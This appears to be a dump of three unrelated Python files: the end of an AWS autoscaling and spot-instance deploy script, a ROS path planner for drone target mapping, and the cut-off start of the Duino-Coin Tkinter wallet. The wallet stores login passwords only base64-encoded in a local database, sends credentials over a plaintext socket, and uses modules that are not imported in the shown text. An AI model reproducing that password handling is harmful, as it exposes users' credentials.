security_groups=[security_groups], instance_type=instance_type)
self.auto_scale_conn.create_launch_configuration(lc)
return lc
def remove_launch_configuration(self, name):
self.auto_scale_conn.delete_launch_configuration(name)
def create_autoscaling_group(self, name, lb_name, zone, tags, instance_ids=None):
lc = self.create_launch_configuration()
as_groups = [a for a in self.auto_scale_conn.get_all_groups() if a.name == name]
as_group = as_groups[0] if as_groups else None
if not as_group:
as_group = AutoScalingGroup(group_name=name, load_balancers=[lb_name], availability_zones=[zone],
launch_config=lc, min_size=4, max_size=4, health_check_type='ELB', health_check_period=120, connection=self.auto_scale_conn,
default_cooldown=self.default_cooldown, desired_capacity=4,
tags=tags)
self.auto_scale_conn.create_auto_scaling_group(as_group)
if instance_ids:
self.auto_scale_conn.attach_instances(name, instance_ids)
scale_up_policy = ScalingPolicy(name='scale_up', adjustment_type='ChangeInCapacity', as_name=name, scaling_adjustment=1, cooldown=self.default_cooldown)
scale_down_policy = ScalingPolicy(name='scale_down', adjustment_type='ChangeInCapacity', as_name=name, scaling_adjustment=-1, cooldown=self.default_cooldown)
self.auto_scale_conn.create_scaling_policy(scale_up_policy)
self.auto_scale_conn.create_scaling_policy(scale_down_policy)
scale_up_policy = self.auto_scale_conn.get_all_policies(as_group=name, policy_names=['scale_up'])[0]
scale_down_policy = self.auto_scale_conn.get_all_policies(as_group=name, policy_names=['scale_down'])[0]
alarm_dimensions = {'AutoScalingGroupName': name}
scale_up_alarm = MetricAlarm(name='scale_up_on_cpu', namespace='AWS/EC2', metric='CPUUtilization',
statistic='Average', comparison='>', threshold=85, period=60, evaluation_periods=1,
alarm_actions=[scale_up_policy.policy_arn], dimensions=alarm_dimensions)
self.cloud_watch_conn.create_alarm(scale_up_alarm)
scale_down_alarm = MetricAlarm(name='scale_down_on_cpu', namespace='AWS/EC2', metric='CPUUtilization', statistic='Average',
comparison='<', threshold=60, period=60, evaluation_periods=1,
alarm_actions=[scale_down_policy.policy_arn], dimensions=alarm_dimensions)
self.cloud_watch_conn.create_alarm(scale_down_alarm)
return as_group
def update_autoscaling_group_max_size(self, as_group, max_size):
setattr(as_group, 'max_size', max_size)
as_group.update()
def update_autoscaling_group_min_size(self, as_group, min_size):
setattr(as_group, 'min_size', min_size)
as_group.update()
def remove_autoscaling_group(self, name):
self.auto_scale_conn.delete_auto_scaling_group(name)
def request_spot_instance(manager, bid, image, instance_type, key_name, zone, security_groups, tags, instances):
print 'Requesting spot instance with {} bid, image {} and {}'.format(bid, image, instance_type)
instances.append(manager.request_spot_instance(bid, image, instance_type, key_name, zone, security_groups, tags))
print 'Created spot instance with {} bid, image {} and {}'.format(bid, image, instance_type)
def deploy(remove=False):
aws_access_key = os.environ['CLOUD_BURST_ACCESS_KEY']
aws_secret_key = os.environ['CLOUD_BURST_SECRET_KEY']
manager = MSBManager(aws_access_key, aws_secret_key)
region = 'us-east-1'
zone = 'us-east-1c'
key_name = 'cloudburstkey'
ssh_http_sg_name = 'SSH/HTTP'
http_sg_name = 'HTTP'
phase = 'phase1'
frontend_image = 'ami-c791c1a2'
number_of_frontend_servers = 1
frontend_server_bid = 0.06
frontend_server_name = 'FrontendServer'
frontend_elb_name = 'FrontendELB'
frontend_servers = []
if remove:
manager.remove_instance_by_tag_name(frontend_server_name)
print 'Frontend Servers removed'
manager.remove_elb(frontend_elb_name)
print 'Frontend ELB removed'
else:
request_spot_instance_threads = []
for dummy in xrange(number_of_frontend_servers):
t = threading.Thread(target=request_spot_instance, args=(manager, frontend_server_bid, frontend_image, 'm3.large', key_name, zone, [ssh_http_sg_name], {'Name': frontend_server_name, '15619project': phase}, frontend_servers, ))
t.start()
request_spot_instance_threads.append(t)
for request_spot_instance_thread in request_spot_instance_threads:
request_spot_instance_thread.join()
ssh_http_sg = manager.get_security_group(http_sg_name)
manager.create_elb(frontend_elb_name, zone, phase, ssh_http_sg.id, [frontend_server.instances[0].id for frontend_server in frontend_servers])
print 'ELB {} created'.format(frontend_elb_name)
if __name__ == "__main__":
if argv[1] == 'deploy':
deploy()
elif argv[1] == 'remove':
deploy(True)
else:
print 'Invalid option'
print 'Done'
|
path_planner.py
|
#!/usr/bin/env python
"""
Zhiang Chen
May 2020
path planner
"""
import rospy
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from std_msgs.msg import Int8
from nav_msgs.msg import Path
from visualization_msgs.msg import Marker, MarkerArray
import uav_motion.msg
import actionlib
import numpy as np
from tf.transformations import quaternion_from_euler
from tf.transformations import euler_from_quaternion
from std_srvs.srv import Empty
import copy
from threading import Thread
import target_mapping.msg
import tf
from sensor_msgs.msg import Image
from sensor_msgs.msg import PointCloud2
from rtabmap_ros.srv import ResetPose, ResetPoseRequest
from utils.open3d_ros_conversion import convertCloudFromRosToOpen3d, convertCloudFromOpen3dToRos
import open3d as o3d
import rospkg
import yaml
import os
import time
import matplotlib.pyplot as plt
import visualization_msgs
rp = rospkg.RosPack()
pkg_path = rp.get_path('target_mapping')
config_path = os.path.join(pkg_path, 'config', 'target_mapping.yaml')
yaml_file = open(config_path)
params = yaml.load(yaml_file, Loader=yaml.FullLoader)
class PathPlanner(object):
def __init__(self):
self.id_ = -1
self.current_pose_ = PoseStamped()
self.current_pose_.pose.orientation.w = 1
self.saved_pose_ = PoseStamped()
self.marker_ = Marker()
self.cylinder_marker_ = Marker()
self.got_cylinder_marker_ = False
self.goal_position_ = Point()
self.goal_yaw_ = 0
self.plan_mode_ = 0
self.alpha = params['alpha']
self.bcem_alpha = params['bcem_alpha']
self.half_vfov = params['half_vfov'] # half vertical fov for mapping
# self.alpha is the camera angle, which is supposed to be 60 degrees according to the camera mount angle.
# However, if we set it as 60 degrees, the lower-bound scanning ray will be too long
# For example, alpha = 60 degrees, half FoV = 20 degrees, distance to keep is 1.5 meters.
# Then the vertical distance from the lower-bound scanning ray is 1.5*tan(60+20), which is 8.5 meters.
# The vertical distance from the upper-bound scanning ray is 1.5*tan(60-20), which is 1.3 meters.
self.mapping = False
rp = rospkg.RosPack()
pkg_path = rp.get_path('target_mapping')
self.pcd_path = os.path.join(pkg_path, 'pcd')
self.pc_map_ = PointCloud2()
self.path = Path()
self.path.header.frame_id = 'map'
self.local_path_pub = rospy.Publisher("/local_path", Path, queue_size=1)
self.poses = []
self.cylinder_marker_pub_ = rospy.Publisher('/path_planner/cylinder_marker', Marker, queue_size=2)
rospy.wait_for_service('stop_sampling')
self.stop_srv_client_ = rospy.ServiceProxy('stop_sampling', Empty)
self.as_ = actionlib.SimpleActionServer("/path_planner/target_plan", target_mapping.msg.TargetPlanAction,
execute_cb=self.targetPlanCallback, auto_start=False)
self.as_.start()
current_pose_sub_ = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.poseCallback,
queue_size=1)
self.client_ = actionlib.SimpleActionClient('waypoints', uav_motion.msg.waypointsAction)
self.client_.wait_for_server()
#self.plan_thread_ = Thread(target=self.targetPlan, args=())
#self.plan_thread_.daemon = True
#self.plan_thread_.start()
self.resumeMap_srv_client_ = rospy.ServiceProxy('/rtabmap/resume', Empty)
self.pauseMap_srv_client_ = rospy.ServiceProxy('/rtabmap/pause', Empty)
self.newMap_srv_client_ = rospy.ServiceProxy('/rtabmap/trigger_new_map', Empty)
self.deleteMap_srv_client_ = rospy.ServiceProxy('/rtabmap/reset', Empty)
self.setPose_srv_client_ = rospy.ServiceProxy('/rtabmap/reset_odom_to_pose', ResetPose)
rospy.wait_for_service('/rtabmap/resume')
rospy.wait_for_service('/rtabmap/pause')
rospy.wait_for_service('/rtabmap/trigger_new_map')
#self.newMap_srv_client_()
self.deleteMap_srv_client_()
self.pauseMap_srv_client_()
map_sub_ = rospy.Subscriber('/rtabmap/cloud_map', PointCloud2, self.pointcloudCallback, queue_size=1)
rospy.loginfo("Path planner has been initialized!")
def startSearch(self):
positions = np.asarray(((0, 0, 24), (-15, 10, 24), (1, 12, 24), (0, 0, 20))) # granite dell search path
#positions = self.lawnmower(pt1=(50, 35), pt2=(-50, -35), origin=(30, 38), spacing=10, vertical=True) # pt1=(-50, -35)
#positions = self.lawnmower(pt1=(0, 35), pt2=(-50, -35), origin=(30, 38), spacing=10, vertical=True) # pt1=(-50, -35)
#positions = self.add_height(positions, 17.) # for blender_terrain, [10, 17]
yaws = self.getHeads(positions)
assert positions.shape[0] == len(yaws)
for i in range(len(yaws)):
goal = uav_motion.msg.waypointsGoal()
goal_p = positions[i]
self.goal_position_.x = float(goal_p[0])
self.goal_position_.y = float(goal_p[1])
self.goal_position_.z = float(goal_p[2])
q = self.current_pose_.pose.orientation
yaw = euler_from_quaternion((q.x, q.y, q.z, q.w))[2]
self.goal_yaw_ = yaw
goal.positions.append(self.goal_position_)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
while True & (not rospy.is_shutdown()):
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(goal_p - current_p)
if self.got_cylinder_marker_:
self.cylinder_marker_pub_.publish(self.cylinder_marker_)
if dist < 0.2:
break
rospy.sleep(1.)
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(self.goal_position_)
goal.yaws.append(yaws[i])
self.client_.send_goal(goal)
rospy.sleep(5.)
def getHeads(self, waypoints):
yaws = []
nm = waypoints.shape[0]
for i in range(nm-1):
currnt_p = waypoints[i][:2]
nxt_p = waypoints[i+1][:2]
dir = nxt_p - currnt_p
yaws.append(np.arctan2(dir[1], dir[0]))
yaws.append(0)
return yaws
def poseCallback(self, pose):
self.current_pose_ = pose
self.poses.append(pose)
self.path.poses = self.poses
self.local_path_pub.publish(self.path)
def pointcloudCallback(self, pc_msg):
if self.mapping:
self.pc_map_ = pc_msg
#xyz = ros_numpy.point_cloud2.pointcloud2_to_xyz_array(pc_msg)
def targetPlanCallback(self, target_plan):
if (self.plan_mode_ == 0) & (target_plan.mode.data != 0):
self.saved_pose_ = copy.deepcopy(self.current_pose_)
self.id_ = target_plan.id.data
self.plan_mode_ = target_plan.mode.data
if self.plan_mode_ != 0:
self.marker_ = target_plan.markers.markers[self.id_]
self.stop_srv_client_()
rospy.sleep(3.)
result = target_mapping.msg.TargetPlanResult()
if self.plan_mode_ == 1:
result.success = self.get_bcylinder_estimating_motion()
self.as_.set_succeeded(result)
elif self.plan_mode_ == 2:
result = self.getMapping()
self.as_.set_succeeded(result)
elif self.plan_mode_ == 0:
print("resuming")
save_position = Point()
save_position.x = self.saved_pose_.pose.position.x
save_position.y = self.saved_pose_.pose.position.y
save_position.z = self.saved_pose_.pose.position.z
q = self.saved_pose_.pose.orientation
yaw = euler_from_quaternion((q.x, q.y, q.z, q.w))[2]
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(save_position)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
while True & (not rospy.is_shutdown()):
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
goal_p = np.asarray((save_position.x,
save_position.y,
save_position.z))
dist = np.linalg.norm(goal_p - current_p)
if dist < 0.2:
break
rospy.sleep(1.)
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(self.goal_position_)
goal.yaws.append(self.goal_yaw_)
self.client_.send_goal(goal)
result.success = True
self.as_.set_succeeded(result)
def get_bcylinder_estimating_motion(self):
print('b-cylinder estimation motion')
# 1. generate a circle
# use the center of the marker, (x, y),
# and the current drone height, (h), as the circle center, (x, y, h).
# then we only need to decide the radius of the circle.
# assume the target is always in the center of the image,
# we can compute the angle between camera's z axis and horizontal plane, alpha.
# the circle will be determined by object center (x, y, z), h, and alpha
marker_position = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, self.marker_.pose.position.z))
drone_position = np.asarray((self.current_pose_.pose.position.x, self.current_pose_.pose.position.y, self.current_pose_.pose.position.z))
h = self.current_pose_.pose.position.z
circle_center = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, h))
radius = (h - marker_position[2])/np.tan(self.bcem_alpha)
# 2. sample keypoints
# from drone's closest point to the farthest point
# get the closest point
dir_cp = drone_position - circle_center
dir_cp = dir_cp/np.linalg.norm(dir_cp)
# cp = circle_center + dir_cp * radius
# get the farthest point
"""
# this is ok to find the farthest point that is farthest to the longest axis
marker_q = (self.marker_.pose.orientation.x, self.marker_.pose.orientation.y, self.marker_.pose.orientation.z, self.marker_.pose.orientation.w)
marker_rot = tf.transformations.quaternion_matrix(marker_q)
marker_scale = (self.marker_.scale.x, self.marker_.scale.y, self.marker_.scale.z)
idx = np.argmax(marker_scale)
long_axis = marker_rot[:, idx]
"""
# or the farthest point is the opposite of the closest point
positions = []
yaws = []
N = 25 # the number of key points on the trajectory
step = 4*np.pi/(N-1)
yaw_cp = np.arctan2(-dir_cp[1], -dir_cp[0])
for i in range(N):
dir_i = self.rotateDirection(dir_cp, step*i)
pos = circle_center + dir_i * radius
#yaw = np.arctan2(-dir_i[1], -dir_i[0]) # this will cause some issues because atan2 is not continuous
yaw = yaw_cp + step*i
positions.append(pos)
yaws.append(yaw)
self.sendWaypoints(positions, yaws)
return True
def getMapping(self):
print('mapping motion')
# get target position
marker_position = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, self.marker_.pose.position.z))
# get target points
points = np.asarray([(p.x, p.y, p.z) for p in self.marker_.points])
# extract points in 3 sigma
three_sigma_stds = points.std(axis=0) * 3
pillar_radius_0 = three_sigma_stds[:2].max()
pillar_top_0 = marker_position[2] + three_sigma_stds[2]
pillar_bottom_0 = marker_position[2] - three_sigma_stds[2]
# approximate points with a pillar
pillar_radius_1 = np.linalg.norm(points[:, :2] - marker_position[:2], axis=1).max() # the radius can also be defined by Gaussian sigma distance
pillar_top_1 = points[:, 2].max()
pillar_bottom_1 = points[:, 2].min() #+ pillar_radius * np.tan(self.alpha)
pillar_radius = min(pillar_radius_0, pillar_radius_1)
pillar_top = min(pillar_top_0, pillar_top_1)
pillar_bottom = min(pillar_bottom_0, pillar_bottom_1)
cylinder_pos = marker_position
cylinder_scale = [pillar_radius*2, pillar_radius*2, pillar_top - points[:, 2].min()]
self.cylinder_marker_ = self.create_cylinder_marker(pos=cylinder_pos, scale=cylinder_scale)
self.got_cylinder_marker_ = True
"""
# get target height (not real height, it's eigenvalue of the vertical vector)
marker_q = (self.marker_.pose.orientation.x, self.marker_.pose.orientation.y, self.marker_.pose.orientation.z,
self.marker_.pose.orientation.w)
marker_rot = tf.transformations.quaternion_matrix(marker_q)
height = (marker_rot[:, 0] * self.marker_.scale.x)[2]
"""
# map plan: sweep from bottom to top
## get circular planes
dist = 1.5 # distance to keep between drone and the closest pillar surface
half_vfov = self.half_vfov
h1 = dist * np.tan(self.alpha + half_vfov)
h2 = dist * np.tan(self.alpha - half_vfov)
d = h1 - h2
N = int(round(np.ceil((pillar_top - pillar_bottom) / d))) # number of sweeping planes
heights = [pillar_bottom + d * i + h1 for i in range(N)]
n = 15 # number of waypoints on a circular path
radius = pillar_radius + dist
## get start position
drone_position = np.asarray((self.current_pose_.pose.position.x, self.current_pose_.pose.position.y,
self.marker_.pose.position.z))
dir_cp = drone_position - marker_position
dir_cp = dir_cp/np.linalg.norm(dir_cp)
## get path points
positions = []
yaws = []
last_yaw = 0
for i in range(N):
center = np.asarray((marker_position[0], marker_position[1], heights[i]))
p, y = self.circularPoints(dir_cp, center, radius, n)
positions.append(p)
yaws.append(y)
positions = np.asarray(positions).reshape(-1, 3)
yaws = np.asarray(yaws).reshape(-1, 1)
start_p = positions[0]
start_y = yaws[0]
point = Point(start_p[0], start_p[1], start_p[2])
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(point)
goal.yaws.append(start_y)
self.client_.send_goal(goal)
while True & (not rospy.is_shutdown()):
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(start_p - current_p)
if dist < 0.2:
break
rospy.sleep(2.)
"""
pose = ResetPoseRequest()
pose.x = self.current_pose_.pose.position.x
pose.y = self.current_pose_.pose.position.y
pose.z = self.current_pose_.pose.position.z
q = self.current_pose_.pose.orientation
euler = euler_from_quaternion((q.x, q.y, q.z, q.w))
pose.roll = euler[0]
pose.pitch = euler[1]
pose.yaw = euler[2]
#self.setPose_srv_client_(pose)
"""
self.mapping = True
self.resumeMap_srv_client_()
self.sendWaypoints(positions[1:], yaws[1:])
last_p = positions[-1]
while True & (not rospy.is_shutdown()):
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(last_p - current_p)
if dist < 0.2:
break
self.mapping = False
# save pointcloud map
print('saving map')
pc_map_msg = copy.copy(self.pc_map_)
o3d_pc = convertCloudFromRosToOpen3d(pc_map_msg)
# downsampling
o3d_pc = o3d_pc.voxel_down_sample(0.05)
# extract points in a sphere
sphere_center = cylinder_pos
sphere_radius = np.linalg.norm(np.asarray(cylinder_scale)/2.)
pts = np.asarray(o3d_pc.points)
clrs = np.asarray(o3d_pc.colors)
in_sphere_bools = [np.linalg.norm(pt - sphere_center) <= sphere_radius for pt in pts]
in_pts = pts[in_sphere_bools]
in_clrs = clrs[in_sphere_bools]
map_pcd = o3d.geometry.PointCloud()
map_pcd.points = o3d.utility.Vector3dVector(in_pts)
map_pcd.colors = o3d.utility.Vector3dVector(in_clrs)
pcd_name = os.path.join(self.pcd_path, str(self.id_) + ".pcd")
o3d.io.write_point_cloud(pcd_name, map_pcd)
self.newMap_srv_client_()
self.deleteMap_srv_client_()
self.pauseMap_srv_client_()
self.got_cylinder_marker_ = False
result = target_mapping.msg.TargetPlanResult()
if len(in_sphere_bools) > 0:
result.success = True
result.pointcloud_map = convertCloudFromOpen3dToRos(map_pcd, 'map')
else:
result.success = False
return result
def circularPoints(self, dir_cp, center, radius, n):
positions = []
yaws = []
step = 2 * np.pi / n
yaw_cp = np.arctan2(-dir_cp[1], -dir_cp[0])
for i in range(n):
dir_i = self.rotateDirection(dir_cp, step * i)
pos = center + dir_i * radius
# yaw = np.arctan2(-dir_i[1], -dir_i[0]) # this will cause some issues because atan2 is not continuous
yaw = yaw_cp + step * i
positions.append(pos)
yaws.append(yaw)
return positions, yaws
def rotateDirection(self, d, theta):
r = np.array(((np.cos(theta), -np.sin(theta), 0),
(np.sin(theta), np.cos(theta), 0),
(0, 0, 0,)))
return np.matmul(r, d)
def sendWaypoints(self, positions, yaws):
goal = uav_motion.msg.waypointsGoal()
for i in range(len(yaws)):
p = positions[i]
yaw = yaws[i]
point = Point(p[0], p[1], p[2])
goal.positions.append(point)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
def lawnmower(self, pt1, pt2, origin, spacing, vertical):
"""
:param pt1: start point (x, y)
:param pt2: end point (x, y)
:param origin: uav origin (x, y)
:param spacing:
:param vertical:
:return:
"""
origin = np.array(origin)
pt1 = np.array(pt1) - origin
pt2 = np.array(pt2) - origin
x1, y1 = pt1
x2, y2 = pt2
width = x2 - x1
length = y2 - y1
waypoints = [np.array((0., 0.)), pt1]
if vertical:
if width < 0:
spacing = - spacing
N = int(width / spacing / 2)
for i in range(N):
pt_0 = waypoints[-1]
pt_1 = pt_0 + np.array((0, length))
pt_2 = pt_1 + np.array((spacing, 0))
pt_3 = pt_2 + np.array((0, -length))
pt_4 = pt_3 + np.array((spacing, 0))
waypoints.append(pt_1)
waypoints.append(pt_2)
waypoints.append(pt_3)
waypoints.append(pt_4)
else:
if length < 0:
spacing = - spacing
N = int(length / spacing / 2)
for i in range(N):
pt_0 = waypoints[-1]
pt_1 = pt_0 + np.array((width, 0))
pt_2 = pt_1 + np.array((0, spacing))
pt_3 = pt_2 + np.array((-width, 0))
pt_4 = pt_3 + np.array((0, spacing))
waypoints.append(pt_1)
waypoints.append(pt_2)
waypoints.append(pt_3)
waypoints.append(pt_4)
waypoints.append(pt2)
return np.array(waypoints)
def plot_path(self, waypoints):
waypoints = np.array(waypoints)
x = waypoints[:, 0]
y = waypoints[:, 1]
plt.plot(x, y)
plt.show()
def add_height(self, waypoints, height):
N = waypoints.shape[0]
new_waypoints = np.zeros((N, 3))
new_waypoints[:, :2] = waypoints
new_waypoints[:, 2] = height
return new_waypoints
def create_cylinder_marker(self, pos=[0, 0, 0], qua=[0, 0, 0, 1], scale=[1, 1, 1]):
"""
:param pos: [x, y, z]
:param qua: [x, y, z, w]
:param scale: [diameter_x, diameter_y, height]; the first two params are diameters for an ellipse
:return:
"""
marker = Marker()
marker.header.frame_id = "map"
marker.header.stamp = rospy.Time.now()
marker.ns = "target_mapping"
marker.id = 0
marker.type = visualization_msgs.msg.Marker.CYLINDER
marker.action = visualization_msgs.msg.Marker.ADD
marker.scale.x = scale[0]
marker.scale.y = scale[1]
marker.scale.z = scale[2]
marker.color.a = .5
marker.color.r = 0.0
marker.color.g = 0.0
marker.color.b = 0.5
marker.pose.position.x = pos[0]
marker.pose.position.y = pos[1]
marker.pose.position.z = pos[2]
marker.pose.orientation.x = qua[0]
marker.pose.orientation.y = qua[1]
marker.pose.orientation.z = qua[2]
marker.pose.orientation.w = qua[3]
return marker
if __name__ == '__main__':
rospy.init_node('path_planner', anonymous=False)
path_planner = PathPlanner()
path_planner.startSearch()
try:
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("Node killed!")
|
Wallet.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
from subprocess import check_call
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
# Version number
VERSION = 2.4
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=ENCRYPTION_ITERATIONS,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return b64e(
b"%b%b%b" % (
salt,
ENCRYPTION_ITERATIONS.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
decoded = b64d(token)
salt, ENCRYPTION_ITERATIONS, token = decoded[:16], decoded[16:20], b64e(
decoded[20:])
ENCRYPTION_ITERATIONS = int.from_bytes(ENCRYPTION_ITERATIONS, "big")
key = _derive_key(
password.encode(),
salt,
ENCRYPTION_ITERATIONS)
return Fernet(key).decrypt(token)
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(64).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv(128).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
